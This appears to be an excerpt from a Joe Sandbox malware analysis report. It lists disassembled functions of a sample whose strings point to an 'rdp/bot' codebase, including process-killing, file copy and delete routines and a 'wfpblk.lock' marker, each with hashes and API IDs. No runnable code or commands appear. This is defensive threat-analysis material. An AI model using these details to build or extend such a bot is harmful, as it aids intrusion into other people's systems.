                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocCriticalFileSection$AttributesCopyEnterFreeLeavefflushfwritememcpywcslen
                                                      • String ID: [E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc
                                                      • API String ID: 4155868088-3920367287
                                                      • Opcode ID: 3b4e7a34a9129897ff6d3e2a171b92da40ceb2305707a17cd7f02296e5fef9ac
                                                      • Instruction ID: 2ddb65d8b2d4e5c4140821a1513be9728822e549ea6fb336366c6c526d0d032c
                                                      • Opcode Fuzzy Hash: 3b4e7a34a9129897ff6d3e2a171b92da40ceb2305707a17cd7f02296e5fef9ac
                                                      • Instruction Fuzzy Hash: C9316631A49A87C6FB609B09E5D43796371EB6E740F444031EA8DCB795DE2CE945C305
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastModuleName
                                                      • String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path$wfpblk.lock
                                                      • API String ID: 2776309574-2006444783
                                                      • Opcode ID: 8b0743739006594648491150ba1350e979c194a544b87ff4122521ba6a39c257
                                                      • Instruction ID: e905451809a38fc1bbf251ebcc4909fc900512828c08f0653afc6ff066a9adb2
                                                      • Opcode Fuzzy Hash: 8b0743739006594648491150ba1350e979c194a544b87ff4122521ba6a39c257
                                                      • Instruction Fuzzy Hash: A0312CA1E58907D6EA11CB5CEB807B52270FB2AB48F484031F94C9F5A5EE7CA909C348
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLast$CloseCreateHandleSize
                                                      • String ID: (path != NULL)$(size != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
                                                      • API String ID: 3555958901-1687387729
                                                      • Opcode ID: 5d5a14a54e9484cbab1cd010350adeadcfcef428cfff90e7ea5d769dac30547b
                                                      • Instruction ID: 3fff52f3084f99e41e50426785d4b328a32d6204b9201d7b74ede2a7a6cb5fb0
                                                      • Opcode Fuzzy Hash: 5d5a14a54e9484cbab1cd010350adeadcfcef428cfff90e7ea5d769dac30547b
                                                      • Instruction Fuzzy Hash: DC612BA1E4E112C3FE304A18A6843791270EF7B364F294532E55ECE2D4DE6CAE85425E
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastObjectSingleWait
                                                      • String ID: $(pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu)$process_wait$~
                                                      • API String ID: 1211598281-4195011794
                                                      • Opcode ID: b4923bec754530ad8a3058dc3744fbddecf07832d11223e4b9a3b7cab9c595a8
                                                      • Instruction ID: df169cf9b2250caf291cf8caee04cb37431d572533c2eba9892c6f307674b080
                                                      • Opcode Fuzzy Hash: b4923bec754530ad8a3058dc3744fbddecf07832d11223e4b9a3b7cab9c595a8
                                                      • Instruction Fuzzy Hash: 50319310E8C303C3FE749658A7C83BC12A1DF6F718F245132F61FCE2919D5DAA85924A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: File$CloseCreateErrorHandleLastTime
                                                      • String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
                                                      • API String ID: 2291555494-3647951244
                                                      • Opcode ID: f5874e6d9fd79edc16e3fcdb1e0a82f9b792a992b4e314340fe334aba537bf0d
                                                      • Instruction ID: e6c1ce11bff95416c0d8f33b19ebad3a5e6574fe3404c3c5fe9cbd311c3a67e6
                                                      • Opcode Fuzzy Hash: f5874e6d9fd79edc16e3fcdb1e0a82f9b792a992b4e314340fe334aba537bf0d
                                                      • Instruction Fuzzy Hash: D1515161D4E102C7FE204A18E7487792270EF3A7A4F184531F95DDF2D4DE6DAA85834D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: _errno$_strtoui64
                                                      • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                                                      • API String ID: 3513630032-2210897324
                                                      • Opcode ID: fc877ab81f5fb23771bc5c5e661677e6874be47513df3575e552a72b653aff37
                                                      • Instruction ID: e755637d1c7d8bd7d5bcda830f4f05e7e8666ade5305f3cc7884c89eb4a8db7e
                                                      • Opcode Fuzzy Hash: fc877ab81f5fb23771bc5c5e661677e6874be47513df3575e552a72b653aff37
                                                      • Instruction Fuzzy Hash: B0219121A08B46C6E6518F19F9807AA3372FB6A784F444032FE4C8B654DF3DD985C708
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: Virtual$ErrorLastProtectQuery
                                                      • String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                      • API String ID: 637304234-2693646698
                                                      • Opcode ID: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
                                                      • Instruction ID: 55e846075b8a20ff0cfb32244a79943cec3351fd5e3f188500d04165bd1adf76
                                                      • Opcode Fuzzy Hash: 0313bfd795e33c478de3b3b1d00fed192ebc31b1e7fa87f2c769477b445c50a5
                                                      • Instruction Fuzzy Hash: BC318231F05A03C6EE108F19EA811796375EB6EB90B448135EE1D8F364DE3CE4458B48
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: _errno
                                                      • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                                                      • API String ID: 2918714741-1991603811
                                                      • Opcode ID: dc69aec3741024bdd5c98b422f0cf858cad9ef31f093b29afe412604ead822d7
                                                      • Instruction ID: 4aeaab6dfdda00cea0d0a81dc1e2308040e1023f8f4213583480e74bc32cf70e
                                                      • Opcode Fuzzy Hash: dc69aec3741024bdd5c98b422f0cf858cad9ef31f093b29afe412604ead822d7
                                                      • Instruction Fuzzy Hash: C8217121A08647D2E7119F19EA80BAA7371FB6A784F444031FE8C8B664DF3DE845D709
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                                      • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                                      • API String ID: 1211020085-2360327764
                                                      • Opcode ID: c8db7f8dc37cca4226943fb2b160d2e50fb0551240e109ae70bad1e8909f3973
                                                      • Instruction ID: c681fbeb7ceec0195ffd1831a0d6935c265a2c6ac720bb2db9ce7960625f0560
                                                      • Opcode Fuzzy Hash: c8db7f8dc37cca4226943fb2b160d2e50fb0551240e109ae70bad1e8909f3973
                                                      • Instruction Fuzzy Hash: 7B116D15E49703C7FE554B9AA6D037A26B0EF7F785F040039EE0E8F2A5DE2DE8458209
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                                      • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                                      • API String ID: 1211020085-2360327764
                                                      • Opcode ID: 66309d14d1d326d562527adad53ed89830da1d68fc8551cf2209a4c90a15a649
                                                      • Instruction ID: ac31d5f0d0c87b0859797f5abaa0740e8722ac9841e4ed5527369cd7c7dea28b
                                                      • Opcode Fuzzy Hash: 66309d14d1d326d562527adad53ed89830da1d68fc8551cf2209a4c90a15a649
                                                      • Instruction Fuzzy Hash: 80116D15E49703C7FE554B9AA2C037A26B0EF7F785F040039EE0E8F6A5DE2DE8458209
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                                      • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                                      • API String ID: 1211020085-2360327764
                                                      • Opcode ID: 73efa2cca21a3f65b2ca12ddfbb7d997f148a4358ae49dce19075afcf16d6a76
                                                      • Instruction ID: 6d8bc3c6ec8f411a25937dae650248ee1143d439457ad648e1091386c0fea1db
                                                      • Opcode Fuzzy Hash: 73efa2cca21a3f65b2ca12ddfbb7d997f148a4358ae49dce19075afcf16d6a76
                                                      • Instruction Fuzzy Hash: 9A116D15E49703C7FE554B9AA2D037A26B0EF7F785F040039EE0E8F2A5DE2DE8458209
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                                                      • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                                                      • API String ID: 1211020085-2360327764
                                                      • Opcode ID: 86b99753e098e05f0f7ffa0bcba3c7b746cca72ccffb5fddb95983930b1c7351
                                                      • Instruction ID: 618e1bb7b66248e8f99f7afd927871058abc972a75a95b1dc8a42c51924c6291
                                                      • Opcode Fuzzy Hash: 86b99753e098e05f0f7ffa0bcba3c7b746cca72ccffb5fddb95983930b1c7351
                                                      • Instruction Fuzzy Hash: AC116D15E49703C7FE554B9AA6C037A26B0EF7F785F040039EE0E8F2A5DE2DE8458209
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: CopyErrorFileLastfflushfwrite
                                                      • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                                                      • API String ID: 2887799713-3464183404
                                                      • Opcode ID: 95e60d1554807ebebfb76cb291e6881a049131fb8747bd7af66a248a5116a26e
                                                      • Instruction ID: da82abe6ed5aea9107df0047d130b5697f8757c5976d7b2a7ec78597233a6b1d
                                                      • Opcode Fuzzy Hash: 95e60d1554807ebebfb76cb291e6881a049131fb8747bd7af66a248a5116a26e
                                                      • Instruction Fuzzy Hash: 5A417251D8E616C3FE244649AB403792675FF3ABC8E140532F94FCE694EEACA781870D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: DeleteErrorFileLast
                                                      • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                                                      • API String ID: 2018770650-4119452840
                                                      • Opcode ID: 4a7863b262c50a3dfc82d79fd485e21488a9497198e34933d55e7bd4ef90229e
                                                      • Instruction ID: bc33d7c39a11b4f47d222c8291c8d9415b419583db0da661e9905420ca935514
                                                      • Opcode Fuzzy Hash: 4a7863b262c50a3dfc82d79fd485e21488a9497198e34933d55e7bd4ef90229e
                                                      • Instruction Fuzzy Hash: 03311D55E8C606D3FE60660CA7803B82171DFAF744E950032E95EDF2D1ED5CAD86830A
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: strlen
                                                      • String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$C:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
                                                      • API String ID: 39653677-892027187
                                                      • Opcode ID: 27465ba21ad1b9cbb9499f71c393ca0b362acfdfa1ae1babc6372082ad89be41
                                                      • Instruction ID: 92fe71f6dcdce7e068c6b177469fab630bbecd5fe15f4bfe43fedde235b03160
                                                      • Opcode Fuzzy Hash: 27465ba21ad1b9cbb9499f71c393ca0b362acfdfa1ae1babc6372082ad89be41
                                                      • Instruction Fuzzy Hash: 9E51D351E4C563D2FE159A5DAB107B51670FB3B788F484032F90D8F2D8EEACE9058308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: strlen$strcat
                                                      • String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
                                                      • API String ID: 2335785903-2423714266
                                                      • Opcode ID: aeaf725b13183e9f8bf21e867b8e19539955e481d57d9fcb69e68115de79d32d
                                                      • Instruction ID: 0c77334f436cba034cafa94ae89496c71d995cc752c6f52c0e5757985c34c6ae
                                                      • Opcode Fuzzy Hash: aeaf725b13183e9f8bf21e867b8e19539955e481d57d9fcb69e68115de79d32d
                                                      • Instruction Fuzzy Hash: 2711A591E48647C5FE115F1D9B453BA26619F2BB84F4C4030FE4D8E28AFE3CD4058348
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
